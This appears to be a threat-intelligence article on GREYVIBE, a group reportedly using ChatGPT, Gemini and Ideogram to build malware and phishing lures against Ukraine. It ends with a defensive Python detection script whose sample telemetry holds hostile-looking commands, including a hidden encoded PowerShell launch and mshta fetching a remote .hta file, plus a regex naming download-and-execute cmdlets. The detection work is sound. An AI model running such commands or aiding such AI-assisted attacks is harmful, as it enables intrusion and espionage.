A newly identified threat actor called GREYVIBE is leveraging generative AI tools — including ChatGPT, Google Gemini, and Ideogram AI — to supercharge cyberattack operations against Ukrainian government, military, and civilian targets. Researchers at WithSecure have tracked the group since at least August 2025, identifying consistent overlaps in infrastructure, tooling, and operational behavior across multiple campaigns.
Who Is GREYVIBE?
GREYVIBE is a previously untracked threat group that has emerged in the context of the ongoing Russia-Ukraine conflict. While no definitive nation-state attribution has been established, the group’s activities align strongly with Russian state interests: researchers found Russian-language artifacts throughout the malware code, observed activity patterns consistent with the Moscow time zone, and noted targeting almost exclusively focused on Ukrainian institutions — government agencies, military units, and civilian organizations.
The group demonstrates signs of operational immaturity in some areas, with poor OPSEC practices such as uploading test samples to public malware repositories. However, its use of AI-assisted development allows it to punch above its technical weight class, rapidly iterating on tools and reducing reliance on reused code that traditional detection methods can fingerprint.
AI-Assisted Attack Development
What makes GREYVIBE particularly noteworthy is its systematic use of generative AI across the full attack lifecycle. WithSecure researchers observed AI-generated code patterns in obfuscators and loaders (named DAYLIGHT and TEASOUP), and in the development of LegionRelay — a custom PowerShell-based remote access trojan. Tools such as ChatGPT and Google Gemini were reportedly used for:
- Generating convincing Ukrainian-language phishing lures impersonating government agencies
- Developing malware components and obfuscation layers
- Creating imagery for lure documents using Ideogram AI
- Supporting post-compromise activities and lateral movement scripts
This AI-assisted approach lowers the technical barrier to entry and accelerates development cycles, while making traditional attribution methods harder since AI-generated code lacks the distinctive stylistic fingerprints of human authors.
Multi-Vector Attack Campaigns
GREYVIBE employs a diverse attack strategy combining several delivery methods:
- Spear-phishing emails: Attackers impersonate Ukrainian government agencies and distribute malicious archives via cloud services such as Google Drive. Payloads execute decoy documents while silently initiating infection chains using custom loaders.
- Fake CAPTCHA pages: Victims are tricked into executing malicious commands under the guise of completing a verification step — a technique known as ClickFix or CAPTCHAJack.
- Deceptive “adult club” websites: These platforms target Ukrainian individuals, particularly military personnel, delivering malware and engaging in social engineering through fake personas on Telegram.
Malware Toolkit: PhantomRelay, FallSpy, and LegionRelay
GREYVIBE deploys three primary malware families:
- PhantomRelay — A modular remote access trojan (RAT) for Windows that uses WebSockets for command execution. It supports file theft, screenshot capture, and exfiltration of messaging data from platforms like Discord and Telegram.
- FallSpy — An Android spyware component that exfiltrates contacts, location data, SMS messages, and device identifiers from the victim’s mobile device.
- LegionRelay — A PowerShell-based RAT developed with significant AI assistance. Ironically, its AI-assisted development introduced exploitable design weaknesses: WithSecure researchers identified flaws in LegionRelay’s backend that exposed attacker infrastructure and allowed them to monitor the group’s activity over time.
AI Jailbreaking and the Broader Threat
The GREYVIBE campaign is consistent with broader trends documented by multiple threat intelligence firms: nation-state-aligned and cybercriminal actors are increasingly using LLM-generated content for malware development, phishing content generation, and social engineering scripts. The fact that a relatively unsophisticated actor can produce operationally effective tools with AI assistance significantly lowers the barrier to entry for cyberattacks.
GREYVIBE’s overlap with known cybercrime infrastructure also suggests a hybrid threat model, where former or active cybercriminals are recruited or contracted to carry out operations aligned with state interests — a pattern previously seen with Russian-aligned groups like Sandworm and the Conti-derived ecosystem.
Recommendations
Organizations with ties to Ukraine or those targeted by Russian intelligence-gathering should take the following steps:
- Implement robust email filtering capable of detecting AI-generated phishing content, including Ukrainian-language lures.
- Block execution of commands initiated via browser interactions (mitigates ClickFix/CAPTCHA-based delivery).
- Deploy endpoint detection covering PowerShell-based RATs and WebSocket-based C2 communications.
- Monitor for FallSpy-style Android malware in environments where BYOD policies are in use.
- Apply LLM-aware threat intelligence frameworks when assessing attacker TTPs, as AI-generated code patterns are increasingly common in nation-state toolkits.
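As an added illustration of the second and third recommendations above (example code written for this page, not code from the article or from WithSecure), the following Python script applies two heuristics to constructed sample telemetry: (1) a script host such as powershell.exe or mshta.exe launched from a browser, or from explorer.exe with hidden/encoded/bypass switches on its command line, which is the process shape a pasted ClickFix command produces; and (2) WebSocket upgrades in a proxy log that go to a bare IP address or carry a PowerShell user agent. Every event, hostname, IP address and command line is invented for the example, and the field layout of the proxy log is an assumption; the thresholds are heuristics to tune against your own baseline, not a signature for GREYVIBE's tooling.

```python
"""Heuristic detections for ClickFix-style script-host launches and
WebSocket C2 from PowerShell, run over constructed sample telemetry."""
import re
from ipaddress import ip_address

# --- Constructed sample telemetry (invented for this example, not from the article) ---
PROCESS_EVENTS = [
    # ClickFix shape: Win+R runs the pasted command, so explorer.exe is the parent
    {"id": 1, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -nop -ep bypass -enc QQBCAEMA"},  # placeholder blob
    # Benign: an administrator running a scheduled script by hand
    {"id": 2, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
    # A browser spawning a script host is abnormal regardless of switches
    {"id": 3, "parent": "chrome.exe", "image": "mshta.exe",
     "cmdline": "mshta https://captcha.example.invalid/verify.hta"},
    {"id": 4, "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

# Assumed proxy log layout: ts client method url status "user-agent" upgrade=<value>
PROXY_LOG = [
    '2025-09-01T10:00:01Z 10.0.0.5 GET wss://203.0.113.7:8443/ws 101 '
    '"Mozilla/5.0 (Windows NT 10.0; Microsoft Windows 10.0.19045; en-US) PowerShell/5.1.19041.1" '
    'upgrade=websocket',
    '2025-09-01T10:00:02Z 10.0.0.6 GET https://intranet.example.invalid/chat 101 '
    '"Mozilla/5.0 (Windows NT 10.0) Chrome/128.0" upgrade=websocket',
    '2025-09-01T10:00:03Z 10.0.0.7 GET https://www.example.invalid/ 200 '
    '"Mozilla/5.0 (Windows NT 10.0) Chrome/128.0" upgrade=-',
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
# Switches that hide the window, bypass policy, or hand PowerShell an encoded/downloaded payload
SUSPICIOUS_SWITCHES = re.compile(
    r"(?i)(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\b|-nop\b|-ep\s+bypass"
    r"|\biex\b|invoke-expression|downloadstring|\birm\b|\biwr\b)"
)


def is_clickfix_candidate(evt):
    """True when a script host is launched the way a pasted ClickFix command would be."""
    image, parent = evt["image"].lower(), evt["parent"].lower()
    if image not in SCRIPT_HOSTS:
        return False
    if parent in BROWSERS:
        return True  # a browser should never spawn a script host directly
    # explorer.exe parents every Run-dialog launch, so require evasion switches too
    return parent == "explorer.exe" and bool(SUSPICIOUS_SWITCHES.search(evt["cmdline"]))


def clickfix_candidates(events):
    return [e["id"] for e in events if is_clickfix_candidate(e)]


PROXY_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d+) '
    r'"(?P<ua>[^"]*)" upgrade=(?P<upgrade>\S+)$'
)
BROWSER_UA = re.compile(r"(Chrome|Firefox|Edg|Safari)/\d")


def websocket_reasons(line):
    """Reasons a WebSocket upgrade looks like script-driven C2; empty list if benign/unparsed."""
    m = PROXY_RE.match(line)
    if not m or m["upgrade"].lower() != "websocket":
        return []
    reasons = []
    host = re.match(r"^\w+://([^/:]+)", m["url"])
    if host:
        try:
            ip_address(host.group(1))  # raises ValueError for a hostname
            reasons.append("WebSocket to a bare IP address")
        except ValueError:
            pass
    if "PowerShell/" in m["ua"]:
        reasons.append("PowerShell user agent")
    elif not BROWSER_UA.search(m["ua"]):
        reasons.append("non-browser user agent")
    return reasons


def suspicious_websockets(lines):
    hits = []
    for line in lines:
        reasons = websocket_reasons(line)
        if reasons:
            m = PROXY_RE.match(line)
            hits.append({"client": m["client"], "url": m["url"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    print("ClickFix candidates:", clickfix_candidates(PROCESS_EVENTS))
    for hit in suspicious_websockets(PROXY_LOG):
        print(hit["client"], hit["url"], "; ".join(hit["reasons"]))
```

Run as-is it reports events 1 and 3 as ClickFix candidates (event 2, the hand-run admin script, is left alone because it carries no evasion switches) and one WebSocket hit for 10.0.0.5. The explorer.exe-plus-switches rule is deliberately stricter than the browser-parent rule because explorer.exe parents every legitimate Run-dialog and desktop-shortcut launch; in a real deployment, feed both detectors from EDR process-creation and proxy telemetry rather than the embedded lists.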